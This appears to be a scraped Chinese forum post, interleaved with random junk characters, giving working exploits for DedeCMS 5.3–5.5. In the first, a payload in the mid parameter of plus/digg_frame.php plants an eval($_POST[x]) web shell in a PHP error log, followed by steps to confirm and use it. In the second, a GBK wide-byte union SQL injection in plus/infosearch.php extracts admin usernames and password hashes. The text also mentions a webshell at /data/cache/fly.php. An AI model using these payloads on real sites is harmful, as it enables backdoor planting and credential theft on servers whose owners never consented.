Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
: d% y3 M' t* @; C: S" @8 v7 X2 W- V, L
: B' ~1 z5 a3 _5 m. W
. v( X+ U2 W# }7 U: h, O
* N0 h" \+ h' k. [! L5 j
7 N8 U" c1 S. e# H8 I7 n+ M
- }2 k' o7 p* v8 b7 g& t. v" P
1 X9 q. f0 `5 c$ z, c
; J7 O1 ^+ k, F3 p5 H- Q1 q织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞! X, V8 \/ |: \
利用了两点：传入非法数值 1024e1024 让 MySQL 解析报错；DedeCMS 把出错的 SQL 原样记录到 data/mysql_error_trace.php——一个用 PHP 注释包裹、文件头部没有访问校验的日志文件（见第 2 步末尾的 */ ?>）。mid 参数里的 */ 提前闭合了这段注释，其后的 PHP 代码在访问该文件时即被执行。
1. 访问网址：
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
（原链接被论坛折叠截断，只剩末尾；由第 2 步回显的 SQL 可知 id 参数值为 1024e1024，%65 即字母 e。）
% M: k. a& D* _& [$ B; w可看见错误信息* K4 i X, u: N1 C$ m7 D3 W
& V: |: E8 P3 d$ {
2. 访问 http://www.abc.com/data/mysql_error_trace.php，看到以下信息即证明注入成功（开头的 int(3) 是 var_dump(3) 的输出，说明 mid 里带入的 PHP 已被执行）：
int(3) Error: Illegal double '1024e1024' value found during parsing
9 M, X6 D1 L# z( \4 W/ w9 ?Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>9 u% M4 b+ Y7 _7 f! K) b
) q+ p u+ U7 [8 c
9 `5 [6 F4 l! @' k4 y& k
3. 执行 dede.rar 里的 test.html（附件本页未收录；从第 1 步的 eval($_POST[x]) 看，它只是一个向 mysql_error_trace.php 提交 POST 参数 x 的表单），注意 form 中 action 的地址是：
4 E1 [ F& r6 W3 a4 y; y R+ d
9 Q% A( s2 ?. Q8 Q* g# M+ R
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
! N! i. v, ^: L; l/ k8 K4 ?7 u: M" b) \
按确定后，若页面仍回显第 2 步的信息，表示写入的后门可以执行。
8 \# s" j; f9 w& l. Z: _& V: @# J) C) W. i5 n2 c' W, d$ [# ^
" p1 T7 M6 ^& `9 M. ?% s( |4 S A6 b, Z" ^" `3 K
: [0 [7 c( m* f' f
0 G6 A) ?9 F/ M: l+ d! ]' S5 _9 B0 j6 H S
0 B* O v5 U" {% L7 `) q% \2 A
) ^: n! S- y) L% B9 }" J4 ]
9 T# _2 P/ B" u' T0 m# T9 H( C. w0 w4 N1 \8 i/ G
6 }9 n: r9 V7 ]3 z
织梦(DedeCms) plus/infosearch.php SQL注入漏洞（q 参数；原文写作"文件注入"，从 payload 看是 union 查询注入）
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
（开头的 %cf' 看起来是 GBK 宽字节绕过：%cf 与转义产生的反斜杠 %5c 合成一个汉字，单引号得以逃逸；随后 union select 从 dede_admin 取 userid 和 pwd，/* 注释掉剩余 SQL。）
|